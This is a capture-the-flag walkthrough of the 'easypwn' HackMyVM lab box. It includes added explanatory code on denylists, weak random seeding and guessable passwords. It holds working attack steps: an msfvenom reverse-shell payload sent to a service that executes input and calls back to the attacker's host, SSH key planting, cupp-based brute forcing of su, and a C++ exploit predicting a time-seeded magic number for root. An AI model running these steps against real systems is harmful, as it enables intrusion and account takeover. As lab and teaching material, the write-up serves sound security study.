hack-my-vm-easypwn

Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.134.213                                                                               [17:25:47]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-22 17:26 CST
Nmap scan report for 192.168.134.213
Host is up (0.0021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6666/tcp open irc

Service exploitation

The box is called easypwn, so port 6666 is presumably the pwn part; let's try connecting to it.

kali@kali [~] ➜  nc 192.168.134.213 6666                                                                                                         [17:26:11]
aaaa
Hackers, get out of my machine
[*] 等待客户端连接...

There it is. Now let's find a way to get the source code.

kali@kali [~] ➜  curl http://192.168.134.213         
</head>
<body>
<h1>Don't Hack Me</h1>
<p>Enumerating directories on my server would ruin everything</p>
</body>
</html>

It's asking us not to scan? With nothing else to go on, scan anyway.

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.134.213 -x txt,html,zip  [17:33:08]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.134.213
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 930]
/.html (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/mysecret.txt (Status: 200) [Size: 383]
kali@kali [~] ➜  curl http://192.168.134.213/mysecret.txt                                                                                        [17:35:46]
Go to the most evil port.
You will get what you want.
Please be gentle with him, maybe he will be afraid.
In order to obtain its source code.
Perhaps you will need the dictionary below.


去那个最邪恶的端口。
你会得到你想要的。
请对他温柔一点,也许它会害怕。
为了得到它的源码。
也许你会需要下面的字典。




/YTlPX4d2UENbWnI.txt

That gives us a wordlist.

kali@kali [~] ➜  curl http://192.168.134.213/YTlPX4d2UENbWnI.txt > dict                                                                          [17:35:51]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 68 100 68 0 0 3761 0 --:--:-- --:--:-- --:--:-- 3777
kali@kali [~] ➜ cat dict [17:36:48]
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower

Keep scanning, this time with that list.

kali@kali [~] ➜  gobuster dir --wordlist=/home/kali/dict  -u http://192.168.134.213                                                              [17:36:52]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.134.213
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/kali/dict
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 10 / 11 (90.91%)
/ll104567 (Status: 200) [Size: 739584]
===============================================================
Finished
===============================================================

curl shows it's a binary file, so download it with wget instead.

kali@kali [~] ➜  curl http://192.168.134.213/ll104567                                                                                            [17:37:41]
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.
kali@kali [~] ➜ wget http://192.168.134.213/ll104567 [17:38:02]
--2025-04-22 17:38:44-- http://192.168.134.213/ll104567
正在连接 192.168.134.213:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:739584 (722K)
正在保存至: “ll104567”

ll104567 100%[============================================================================>] 722.25K --.-KB/s 用时 0.03s

2025-04-22 17:38:44 (22.6 MB/s) - 已保存 “ll104567” [739584/739584])
kali@kali [~] ➜ file ll104567 [17:38:48]
ll104567: Zip archive data, at least v2.0 to extract, compression method=deflate

A zip archive; the source code is presumably inside.

kali@kali [~] ➜  unzip ll104567                                                                                                                  [17:40:06]
Archive: ll104567
[ll104567] opt/server password:

It wants a password. I tried the given wordlist, which didn't work, so brute-force it directly.

kali@kali [~/Desktop] ➜  zip2john ll104567 > hash                                                                                            [17:41:13]
ver 2.0 efh 5455 efh 7875 ll104567.zip/opt/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8
kali@kali [~/Desktop] ➜  john --show hash                                                                                                        [17:41:46]

ll104567.zip/opt/server:oooooo:opt/server:ll104567.zip::ll104567.zip

1 password hash cracked, 0 left

I had already cracked it before, which is why --show prints the result straight away; running john hash is all it takes. After extracting, just drag the binary into IDA.

As long as none of the restricted bytes are present, the code we send in gets executed. Let's see what is filtered: it looks like only about 4 bytes, 0x20, 0x0f, 0xcd, 0x22, 0x09, 0x00, 0x0a; not many.
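The byte denylist is the service's only guard: whatever survives it is executed. The block below is an added example, not the challenge binary (which the page does not show); it implements such a check over the bytes listed above (assumed to be the complete list) and runs it on constructed inputs, including the "aaaa" plus newline that nc sent earlier, which already fails on the 0x0a:

```cpp
#include <cstddef>
#include <cstdio>
#include <set>
#include <string>
#include <vector>

// Byte denylist reconstructed from the write-up's IDA notes (assumption: this
// is the complete list the service checks before running the buffer).
static const std::set<unsigned char> kForbidden = {0x00, 0x09, 0x0a, 0x0f,
                                                   0x20, 0x22, 0xcd};

// Offsets of every forbidden byte in the buffer; an empty result means the
// check passes and the service would execute the buffer as code.
std::vector<std::size_t> forbidden_offsets(const std::string& payload,
                                           const std::set<unsigned char>& bad = kForbidden) {
    std::vector<std::size_t> hits;
    for (std::size_t i = 0; i < payload.size(); ++i) {
        if (bad.count(static_cast<unsigned char>(payload[i]))) hits.push_back(i);
    }
    return hits;
}

bool filter_accepts(const std::string& payload) {
    return forbidden_offsets(payload).empty();
}

int main() {
    // Constructed inputs: the nc probe from the write-up ("aaaa" followed by
    // the newline nc appends) and two other buffers.
    const std::string samples[] = {
        std::string("aaaa\n"),
        std::string("aaaa"),
        std::string("ab\x00\x22zz", 6),
    };
    for (const std::string& s : samples) {
        std::vector<std::size_t> hits = forbidden_offsets(s);
        if (hits.empty()) {
            std::printf("%zu bytes: accepted (would be executed)\n", s.size());
        } else {
            std::printf("%zu bytes: rejected, first bad byte 0x%02x at offset %zu\n",
                        s.size(), static_cast<unsigned char>(s[hits[0]]), hits[0]);
        }
    }
    return 0;
}
```

A denylist over raw bytes says nothing about what the bytes do once executed; encoders exist precisely to route around such lists, which is what the msfvenom -b step later on the page relies on. The durable fix is not to execute client-supplied data at all.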

Generate a reverse-shell binary directly, with the filtered bytes excluded, and send it to the port.

kali@kali [~] ➜  msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.134.141 LPORT=8888 -b '\x00\x20\x0f\xcd\x0a\x0f\x22\x09' -f raw > binary 
kali@kali [~] ➜ cat binary | nc 192.168.134.213 6666

That gives a reverse shell; I then wrote an SSH public key into it.

wget http://192.168.134.141:8000/id_rsa.pub
--2025-04-22 06:20:33-- http://192.168.134.141:8000/id_rsa.pub
Connecting to 192.168.134.141:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 748 [application/vnd.exstream-package]
Saving to: 'id_rsa.pub'

0K 100% 83.6M=0s

2025-04-22 06:20:33 (83.6 MB/s) - 'id_rsa.pub' saved [748/748]

ls
id_rsa.pub
mv id_rsa.pub authorized_keys
ls
authorized_keys
id
uid=1001(lamb) gid=1001(lamb) groups=1001(lamb)
kali@kali [~/.ssh] ➜  ssh lamb@192.168.134.213                                                                                                   [18:21:23]
The authenticity of host '192.168.134.213 (192.168.134.213)' can't be established.
ED25519 key fingerprint is SHA256:rXcjV9xeZG+J6KZLTr1t2Xi2ErBvMauXjxH4EBvhV0c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.134.213' (ED25519) to the list of known hosts.
Linux pwnding 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 20 03:24:48 2025 from 192.168.1.32
lamb@pwnding:~$ cat use3e3e3e3e3sr.txt
flag{3a463d08f2ae11efbeb6000c29094b2d}

Privilege escalation

lamb@pwnding:~$ cat this_is_a_tips.txt 
There is a fun tool called cupp.
I heard it's a good social engineering dictionary generator.
Are there really people that stupid these days? haha.
There is only one way to become ROOT, which is to execute getroot!!!
And don't forget, this is a PWN type machine.

有一个很好玩的工具叫做 cupp.
听说那是一个不错的社会工程学字典生成器.
现在真的还会有人这么蠢吗?haha.
成为 ROOT 的方法只有一条,就是执行 getroot !!!
而且你不要忘记了,这是一个pwn类型的机器.

getroot has to be executed, so it's presumably another binary.

lamb@pwnding:~$ which getroot
/usr/local/bin/getroot
lamb@pwnding:~$ ls -la /usr/local/bin/getroot
-rwxr-xr-x 1 root root 18912 Feb 20 02:19 /usr/local/bin/getroot
lamb@pwnding:~$ cp /usr/local/bin/getroot .
lamb@pwnding:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.134.141 - - [22/Apr/2025 06:31:51] "GET /getroot HTTP/1.1" 200 -

Let's pull it over and take a look.

Even if you can't follow the decompiled code, it doesn't matter: the random number is seeded with the current time, so getroot and the script below must be run at the same time.

Just let an AI write it. The script simply reproduces getroot's computation to predict the number; because the C program's rand() is only pseudo-random, the seed has to match.

#include <iostream>
#include <cstdlib>
#include <ctime>
#include <cmath>
#include <algorithm>

#ifndef M_PI
#define M_PI 3.14159265358979323846
#endif

int main() {
    // Seed with the current time, exactly as getroot does; the seed only
    // matches if both programs start within the same second.
    std::time_t seed = std::time(nullptr);
    std::srand(seed);

    // Generate v20
    int v20 = std::rand() % 86400;

    // Two uniform values for the normal distribution (RAND_MAX is 2147483647 on glibc)
    int rand1 = std::rand();
    int rand2 = std::rand();
    double u1 = static_cast<double>(rand1) / 2147483647.0;
    double u2 = static_cast<double>(rand2) / 2147483647.0;

    // Box-Muller transform to get a normally distributed value
    // (rand1 == 0 would give log(0) = -inf; rand() returns 0 with
    // probability about 2^-31, so that case is ignored here)
    double magnitude = std::sqrt(-2.0 * std::log(u1));
    double normal = magnitude * std::cos(2 * M_PI * u2);

    // Compute v15 and clamp it to the valid range
    int v15 = static_cast<int>(5.0 * normal + v20);
    v15 = std::max(0, std::min(v15, 86399));

    // Print the predicted magic number
    std::cout << v15 + 12345 << std::endl;

    return 0;
}
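What makes this work is that srand(time(NULL)) turns the whole "random" value into a function of the launch second. The block below is an added example, neither getroot's code nor the script above: it wraps the same arithmetic in a function of the seed (assumption: getroot makes exactly these three rand() calls after seeding with the current time, as the script reproduces), lists the candidates for a few seconds on either side of the current time so that a small start-up delay between the two programs does not break the prediction, and shows the fix a developer would apply, drawing from std::random_device instead of a time seed:

```cpp
#include <algorithm>
#include <cmath>
#include <cstdio>
#include <cstdlib>
#include <ctime>
#include <random>
#include <vector>

#ifndef M_PI
#define M_PI 3.14159265358979323846
#endif

// The magic number as a pure function of the seed. Assumption: getroot seeds
// with time(NULL) and then performs exactly these three rand() calls and this
// arithmetic (this is what the write-up's script reproduces).
int magic_for_seed(unsigned int seed) {
    std::srand(seed);
    int v20 = std::rand() % 86400;
    double u1 = std::rand() / 2147483647.0;
    double u2 = std::rand() / 2147483647.0;
    if (u1 <= 0.0) u1 = 1e-12;  // guard added here: log(0) would be -inf
    double normal = std::sqrt(-2.0 * std::log(u1)) * std::cos(2.0 * M_PI * u2);
    int v15 = static_cast<int>(5.0 * normal + v20);
    v15 = std::max(0, std::min(v15, 86399));
    return v15 + 12345;
}

// Candidates for every seed in [now - before, now + after]. A start-up delay
// or clock skew of a few seconds between getroot and the predictor is covered
// by trying each candidate, so "run both at the same instant" is not a
// protection the program can rely on.
std::vector<int> candidates_around(std::time_t now, int before, int after) {
    std::vector<int> out;
    for (long long t = static_cast<long long>(now) - before;
         t <= static_cast<long long>(now) + after; ++t) {
        out.push_back(magic_for_seed(static_cast<unsigned int>(t)));
    }
    return out;
}

// The fix: draw from the OS entropy source. There is no seed to recover, so
// no other process can reproduce the value.
int magic_unpredictable() {
    std::random_device rd;
    std::uniform_int_distribution<int> dist(0, 86399);
    return dist(rd) + 12345;
}

int main() {
    std::time_t now = std::time(nullptr);
    std::printf("seed %lld -> %d\n", static_cast<long long>(now),
                magic_for_seed(static_cast<unsigned int>(now)));
    for (int m : candidates_around(now, 2, 2)) std::printf("candidate %d\n", m);
    std::printf("unpredictable draw: %d\n", magic_unpredictable());
    return 0;
}
```

Because the value depends on the libc's rand() implementation, the candidates must be computed with the same libc as the target (here the script is compiled on the box itself). With the random_device version there is nothing to replay, and a check like getroot's would have to be replaced by a real credential rather than a guessable number.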

The problem is that we can't use it yet: we aren't root, and running it as lamb reads nothing out; sudo -l asks for a password, and there's presumably something in sudo -l.

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 4 Apr 22 06:19 /tmp/server_monitor.lock
-rw-r--r-- 1 root root 51200 Apr 22 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 1936 Feb 24 07:59 /var/backups/.secret/.verysecret/.noooooo/note2.txt

linpeas turned up a txt file.

lamb@pwnding:~$ cat /var/backups/.secret/.verysecret/.noooooo/note2.txt
The Compass and the Campfire

David knelt beside his ten-year-old son, Jake, their shared backpack spilling onto the forest floor. "Lost?" Jake whispered, staring at the identical trees clawing at the twilight. David’s calloused fingers brushed the cracked compass in his palm—a relic from his father, its needle trembling like a moth. "Not lost," he lied. "Just… rerouting."

Jake’s eyes narrowed, too sharp for comfort. "Your compass is broken."

A chuckle escaped David, brittle as dry leaves. "Compasses don’t break, bud. They… forget." He flipped it open, the glass fogged with age. "See? North isn’t where it should be. It’s where it chooses to be tonight."

The boy frowned, then yelped as a pinecone thudded beside him. A red squirrel chattered overhead, its tail flicking like a metronome. Jake’s fear dissolved into giggles. David watched, throat tight. He’s still young enough to laugh at squirrels.

"Dad?" Jake unzipped his jacket, revealing three granola bars and a glowstick. "We’ve got supplies. Let’s build a fort."

They wove branches into a crooked shelter, Jake’s hands steady where David’s shook. When the first stars pierced the canopy, David confessed: "Grandpa gave me this compass the day I got lost in the mall. Told me it’d always point home."

Jake snapped the glowstick, bathing their fort in alien green. "Does it work now?"

The needle quivered, settling northwest. Toward the distant highway hum, not their cabin’s woodsmoke. David closed the brass lid. "Nope. But you do." He nodded at Jake’s pocket—where a crumpled trail map peeked out, dotted with the boy’s doodled dinosaurs.

Dawn found them at the cabin’s porch, guided by Jake’s roars laughter and the squirrels he’d named "Sir Nibbles". The compass stayed in David’s pocket, its secret safe: true north had shifted years ago, anyway—from steel poles to a gap-toothed grin eating pancakes at 6 AM.

A short story. Combined with the earlier hint about cupp, the idea is presumably to build a social-engineering wordlist from it and recover the password that way.

kali@kali [~/web_shell_toos/cupp] git:(master) ➜  python3 cupp.py -i                                                                             [20:08:29]
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: David
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name: Jake
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to david.txt, counting 500 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with david.txt and shoot! Good luck!
lamb@pwnding:~$ wget http://192.168.134.141:8000/suForce
--2025-04-22 08:17:20-- http://192.168.134.141:8000/suForce
Connecting to 192.168.134.141:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2430 (2.4K) [application/octet-stream]
Saving to: ‘suForce’

suForce 100%[============================================================================>] 2.37K --.-KB/s in 0s

2025-04-22 08:17:20 (38.0 MB/s) - ‘suForce’ saved [2430/2430]

lamb@pwnding:~$ chmod +x suForce
lamb@pwnding:~$ wget http://192.168.134.141:8000/cupp/david.txt
--2025-04-22 08:18:12-- http://192.168.134.141:8000/cupp/david.txt
Connecting to 192.168.134.141:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4987 (4.9K) [text/plain]
Saving to: ‘david.txt’

david.txt 100%[============================================================================>] 4.87K --.-KB/s in 0s

2025-04-22 08:18:12 (112 MB/s) - ‘david.txt’ saved [4987/4987]
lamb@pwnding:~$ ./suForce -u lamb -w david.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | lamb
📖 Wordlist | david.txt
🔎 Status | 372/499/74%/ekaJ_2016
💥 Password | ekaJ_2016
───────────────────────────────────
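The recovered password, ekaJ_2016, is the child's name from the story reversed, capital letter and all, plus an underscore and a year, exactly the kind of derivation a profiler like cupp enumerates from a few public facts. The block below is an added example (not cupp's code; its mutation rules are a simplified assumption, not cupp's actual ones): it builds the candidate set from the two names in note2.txt and reports whether a given password falls inside it, which is the check a defender can run before accepting a password:

```cpp
#include <algorithm>
#include <cctype>
#include <cstdio>
#include <set>
#include <string>
#include <vector>

// Constructed profile: the two names that note2.txt gives away.
static const std::vector<std::string> kProfileWords = {"David", "Jake"};

// Year span appended to each base form (an assumption standing in for
// cupp's own range).
static const int kYearFrom = 1990;
static const int kYearTo = 2025;

static std::string lower_str(std::string s) {
    for (char& c : s) c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
    return s;
}

static std::string capitalized(std::string s) {
    s = lower_str(s);
    if (!s.empty()) s[0] = static_cast<char>(std::toupper(static_cast<unsigned char>(s[0])));
    return s;
}

static std::string reversed(std::string s) {
    std::reverse(s.begin(), s.end());
    return s;
}

// Spelling variants of one word: lower, Capitalized, and both reversed
// ("Jake" -> "jake", "Jake", "ekaj", "ekaJ"). Simplified cupp-style rules.
std::vector<std::string> base_forms(const std::string& word) {
    std::string l = lower_str(word), c = capitalized(word);
    return {l, c, reversed(l), reversed(c)};
}

// Every candidate derivable from the profile: each base form alone and with
// a year appended directly, appended with an underscore, or prepended.
std::set<std::string> profile_candidates(const std::vector<std::string>& words) {
    std::set<std::string> out;
    for (const std::string& w : words) {
        for (const std::string& b : base_forms(w)) {
            out.insert(b);
            for (int y = kYearFrom; y <= kYearTo; ++y) {
                const std::string ys = std::to_string(y);
                out.insert(b + ys);
                out.insert(b + "_" + ys);
                out.insert(ys + b);
            }
        }
    }
    return out;
}

// True when the password is one of the profile-derived candidates, i.e. when
// a profiler fed the same public facts would produce it.
bool derivable_from_profile(const std::string& password,
                            const std::vector<std::string>& words) {
    return profile_candidates(words).count(password) > 0;
}

int main() {
    const char* tests[] = {"ekaJ_2016", "David2001", "correct-horse-battery"};
    for (const char* p : tests) {
        std::printf("%-24s %s\n", p,
                    derivable_from_profile(p, kProfileWords) ? "derivable from profile"
                                                             : "not in candidate set");
    }
    return 0;
}
```

The candidate set here is under a thousand strings, which is why suForce found the password after 372 attempts: a password built from family names and a year offers no more resistance than the size of that list, regardless of its length or mixed case.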

With the password in hand, run sudo -l.

lamb@pwnding:~$ sudo -l
[sudo] password for lamb:
Matching Defaults entries for lamb on pwnding:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lamb may run the following commands on pwnding:
(ALL : ALL) PASSWD: /usr/local/bin/getroot
lamb@pwnding:~$

We do indeed have sudo rights on getroot; let's run it together with the AI-generated script.

lamb@pwnding:~$ g++ -o b a.cpp
lamb@pwnding:~$ sudo /usr/local/bin/getroot $(./b)
$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0

We get a hash, and that hash itself is the password. I also tried cracking it, but the cracked result is not the password. The end.